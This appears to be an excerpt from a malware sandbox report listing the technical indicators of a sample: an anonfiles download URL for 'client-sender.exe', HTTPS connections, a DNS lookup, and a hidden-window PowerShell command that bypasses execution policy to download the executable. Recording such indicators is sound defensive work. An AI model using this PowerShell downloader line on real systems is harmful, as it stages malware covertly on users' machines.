Technical Information
- https://cdn-131.anonfiles.com/gbo4w9i5y0/09bd71e9-1668905606/client-sender.exe as client-sender.exe
- 'cd#####.anonfiles.com':443
- 'cd#####.anonfiles.com':443
- DNS ASK cd#####.anonfiles.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://cdn-131.anonfiles.com/Gbo4w9I5y0/09bd71e9-1668905606/Client-sender.exe','...' (with hidden window)